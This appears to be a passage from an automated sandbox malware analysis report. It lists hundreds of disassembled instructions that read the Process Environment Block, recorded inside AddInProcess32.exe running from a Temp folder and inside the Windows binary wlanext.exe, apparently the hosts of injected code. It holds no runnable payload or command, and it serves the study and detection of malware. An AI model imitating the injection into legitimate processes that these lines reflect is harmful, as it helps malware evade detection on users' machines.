Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B635A1 mov eax, dword ptr fs:[00000030h]	11_2_01B635A1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6FD9B mov eax, dword ptr fs:[00000030h]	11_2_01B6FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6FD9B mov eax, dword ptr fs:[00000030h]	11_2_01B6FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]	11_2_01B62581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]	11_2_01B62581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]	11_2_01B62581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B62581 mov eax, dword ptr fs:[00000030h]	11_2_01B62581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]	11_2_01B32D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]	11_2_01B32D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]	11_2_01B32D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]	11_2_01B32D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B32D8A mov eax, dword ptr fs:[00000030h]	11_2_01B32D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BE8DF1 mov eax, dword ptr fs:[00000030h]	11_2_01BE8DF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4D5E0 mov eax, dword ptr fs:[00000030h]	11_2_01B4D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4D5E0 mov eax, dword ptr fs:[00000030h]	11_2_01B4D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]	11_2_01BFFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]	11_2_01BFFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]	11_2_01BFFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFFDE2 mov eax, dword ptr fs:[00000030h]	11_2_01BFFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C005AC mov eax, dword ptr fs:[00000030h]	11_2_01C005AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C005AC mov eax, dword ptr fs:[00000030h]	11_2_01C005AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]	11_2_01BB6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]	11_2_01BB6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]	11_2_01BB6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6DC9 mov ecx, dword ptr fs:[00000030h]	11_2_01BB6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]	11_2_01BB6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6DC9 mov eax, dword ptr fs:[00000030h]	11_2_01BB6DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B43D34 mov eax, dword ptr fs:[00000030h]	11_2_01B43D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3AD30 mov eax, dword ptr fs:[00000030h]	11_2_01B3AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFE539 mov eax, dword ptr fs:[00000030h]	11_2_01BFE539
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BBA537 mov eax, dword ptr fs:[00000030h]	11_2_01BBA537
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B64D3B mov eax, dword ptr fs:[00000030h]	11_2_01B64D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B64D3B mov eax, dword ptr fs:[00000030h]	11_2_01B64D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B64D3B mov eax, dword ptr fs:[00000030h]	11_2_01B64D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5C577 mov eax, dword ptr fs:[00000030h]	11_2_01B5C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5C577 mov eax, dword ptr fs:[00000030h]	11_2_01B5C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B57D50 mov eax, dword ptr fs:[00000030h]	11_2_01B57D50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C08D34 mov eax, dword ptr fs:[00000030h]	11_2_01C08D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B73D43 mov eax, dword ptr fs:[00000030h]	11_2_01B73D43
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB3540 mov eax, dword ptr fs:[00000030h]	11_2_01BB3540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BE3D40 mov eax, dword ptr fs:[00000030h]	11_2_01BE3D40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C08CD6 mov eax, dword ptr fs:[00000030h]	11_2_01C08CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4849B mov eax, dword ptr fs:[00000030h]	11_2_01B4849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF14FB mov eax, dword ptr fs:[00000030h]	11_2_01BF14FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]	11_2_01BB6CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]	11_2_01BB6CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6CF0 mov eax, dword ptr fs:[00000030h]	11_2_01BB6CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6BC2C mov eax, dword ptr fs:[00000030h]	11_2_01B6BC2C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]	11_2_01BB6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]	11_2_01BB6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]	11_2_01BB6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB6C0A mov eax, dword ptr fs:[00000030h]	11_2_01BB6C0A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1C06 mov eax, dword ptr fs:[00000030h]	11_2_01BF1C06
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0740D mov eax, dword ptr fs:[00000030h]	11_2_01C0740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0740D mov eax, dword ptr fs:[00000030h]	11_2_01C0740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0740D mov eax, dword ptr fs:[00000030h]	11_2_01C0740D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5746D mov eax, dword ptr fs:[00000030h]	11_2_01B5746D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCC450 mov eax, dword ptr fs:[00000030h]	11_2_01BCC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCC450 mov eax, dword ptr fs:[00000030h]	11_2_01BCC450
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6A44B mov eax, dword ptr fs:[00000030h]	11_2_01B6A44B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B48794 mov eax, dword ptr fs:[00000030h]	11_2_01B48794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB7794 mov eax, dword ptr fs:[00000030h]	11_2_01BB7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB7794 mov eax, dword ptr fs:[00000030h]	11_2_01BB7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB7794 mov eax, dword ptr fs:[00000030h]	11_2_01BB7794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B737F5 mov eax, dword ptr fs:[00000030h]	11_2_01B737F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6E730 mov eax, dword ptr fs:[00000030h]	11_2_01B6E730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5B73D mov eax, dword ptr fs:[00000030h]	11_2_01B5B73D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5B73D mov eax, dword ptr fs:[00000030h]	11_2_01B5B73D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B34F2E mov eax, dword ptr fs:[00000030h]	11_2_01B34F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B34F2E mov eax, dword ptr fs:[00000030h]	11_2_01B34F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5F716 mov eax, dword ptr fs:[00000030h]	11_2_01B5F716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C08F6A mov eax, dword ptr fs:[00000030h]	11_2_01C08F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCFF10 mov eax, dword ptr fs:[00000030h]	11_2_01BCFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCFF10 mov eax, dword ptr fs:[00000030h]	11_2_01BCFF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6A70E mov eax, dword ptr fs:[00000030h]	11_2_01B6A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6A70E mov eax, dword ptr fs:[00000030h]	11_2_01B6A70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0070D mov eax, dword ptr fs:[00000030h]	11_2_01C0070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C0070D mov eax, dword ptr fs:[00000030h]	11_2_01C0070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4FF60 mov eax, dword ptr fs:[00000030h]	11_2_01B4FF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4EF40 mov eax, dword ptr fs:[00000030h]	11_2_01B4EF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C08ED6 mov eax, dword ptr fs:[00000030h]	11_2_01C08ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BB46A7 mov eax, dword ptr fs:[00000030h]	11_2_01BB46A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BCFE87 mov eax, dword ptr fs:[00000030h]	11_2_01BCFE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B616E0 mov ecx, dword ptr fs:[00000030h]	11_2_01B616E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B476E2 mov eax, dword ptr fs:[00000030h]	11_2_01B476E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C00EA5 mov eax, dword ptr fs:[00000030h]	11_2_01C00EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C00EA5 mov eax, dword ptr fs:[00000030h]	11_2_01C00EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01C00EA5 mov eax, dword ptr fs:[00000030h]	11_2_01C00EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B78EC7 mov eax, dword ptr fs:[00000030h]	11_2_01B78EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B636CC mov eax, dword ptr fs:[00000030h]	11_2_01B636CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BEFEC0 mov eax, dword ptr fs:[00000030h]	11_2_01BEFEC0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BEFE3F mov eax, dword ptr fs:[00000030h]	11_2_01BEFE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3E620 mov eax, dword ptr fs:[00000030h]	11_2_01B3E620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6A61C mov eax, dword ptr fs:[00000030h]	11_2_01B6A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B6A61C mov eax, dword ptr fs:[00000030h]	11_2_01B6A61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3C600 mov eax, dword ptr fs:[00000030h]	11_2_01B3C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3C600 mov eax, dword ptr fs:[00000030h]	11_2_01B3C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B3C600 mov eax, dword ptr fs:[00000030h]	11_2_01B3C600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B68E00 mov eax, dword ptr fs:[00000030h]	11_2_01B68E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BF1608 mov eax, dword ptr fs:[00000030h]	11_2_01BF1608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]	11_2_01B5AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]	11_2_01B5AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]	11_2_01B5AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]	11_2_01B5AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B5AE73 mov eax, dword ptr fs:[00000030h]	11_2_01B5AE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B4766D mov eax, dword ptr fs:[00000030h]	11_2_01B4766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]	11_2_01B47E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]	11_2_01B47E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]	11_2_01B47E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]	11_2_01B47E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]	11_2_01B47E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01B47E41 mov eax, dword ptr fs:[00000030h]	11_2_01B47E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFAE44 mov eax, dword ptr fs:[00000030h]	11_2_01BFAE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01BFAE44 mov eax, dword ptr fs:[00000030h]	11_2_01BFAE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D82ACB mov eax, dword ptr fs:[00000030h]	17_2_02D82ACB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D82AE4 mov eax, dword ptr fs:[00000030h]	17_2_02D82AE4
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8D294 mov eax, dword ptr fs:[00000030h]	17_2_02D8D294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8D294 mov eax, dword ptr fs:[00000030h]	17_2_02D8D294
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6AAB0 mov eax, dword ptr fs:[00000030h]	17_2_02D6AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D6AAB0 mov eax, dword ptr fs:[00000030h]	17_2_02D6AAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8FAB0 mov eax, dword ptr fs:[00000030h]	17_2_02D8FAB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D552A5 mov eax, dword ptr fs:[00000030h]	17_2_02D552A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D552A5 mov eax, dword ptr fs:[00000030h]	17_2_02D552A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D552A5 mov eax, dword ptr fs:[00000030h]	17_2_02D552A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D552A5 mov eax, dword ptr fs:[00000030h]	17_2_02D552A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D552A5 mov eax, dword ptr fs:[00000030h]	17_2_02D552A5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E0B260 mov eax, dword ptr fs:[00000030h]	17_2_02E0B260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E0B260 mov eax, dword ptr fs:[00000030h]	17_2_02E0B260
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E28A62 mov eax, dword ptr fs:[00000030h]	17_2_02E28A62
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DE4257 mov eax, dword ptr fs:[00000030h]	17_2_02DE4257
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59240 mov eax, dword ptr fs:[00000030h]	17_2_02D59240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59240 mov eax, dword ptr fs:[00000030h]	17_2_02D59240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59240 mov eax, dword ptr fs:[00000030h]	17_2_02D59240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D59240 mov eax, dword ptr fs:[00000030h]	17_2_02D59240
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D9927A mov eax, dword ptr fs:[00000030h]	17_2_02D9927A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1EA55 mov eax, dword ptr fs:[00000030h]	17_2_02E1EA55
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5AA16 mov eax, dword ptr fs:[00000030h]	17_2_02D5AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D5AA16 mov eax, dword ptr fs:[00000030h]	17_2_02D5AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D55210 mov eax, dword ptr fs:[00000030h]	17_2_02D55210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D55210 mov ecx, dword ptr fs:[00000030h]	17_2_02D55210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D55210 mov eax, dword ptr fs:[00000030h]	17_2_02D55210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D55210 mov eax, dword ptr fs:[00000030h]	17_2_02D55210
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D73A1C mov eax, dword ptr fs:[00000030h]	17_2_02D73A1C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D68A0A mov eax, dword ptr fs:[00000030h]	17_2_02D68A0A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D94A2C mov eax, dword ptr fs:[00000030h]	17_2_02D94A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D94A2C mov eax, dword ptr fs:[00000030h]	17_2_02D94A2C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1AA16 mov eax, dword ptr fs:[00000030h]	17_2_02E1AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E1AA16 mov eax, dword ptr fs:[00000030h]	17_2_02E1AA16
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7A229 mov eax, dword ptr fs:[00000030h]	17_2_02D7A229
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD53CA mov eax, dword ptr fs:[00000030h]	17_2_02DD53CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02DD53CA mov eax, dword ptr fs:[00000030h]	17_2_02DD53CA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D803E2 mov eax, dword ptr fs:[00000030h]	17_2_02D803E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D803E2 mov eax, dword ptr fs:[00000030h]	17_2_02D803E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D803E2 mov eax, dword ptr fs:[00000030h]	17_2_02D803E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D803E2 mov eax, dword ptr fs:[00000030h]	17_2_02D803E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D803E2 mov eax, dword ptr fs:[00000030h]	17_2_02D803E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D803E2 mov eax, dword ptr fs:[00000030h]	17_2_02D803E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D7DBE9 mov eax, dword ptr fs:[00000030h]	17_2_02D7DBE9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02E25BA5 mov eax, dword ptr fs:[00000030h]	17_2_02E25BA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D8B390 mov eax, dword ptr fs:[00000030h]	17_2_02D8B390
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D82397 mov eax, dword ptr fs:[00000030h]	17_2_02D82397
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 17_2_02D61B8F mov eax, dword ptr fs:[00000030h]	17_2_02D61B8F
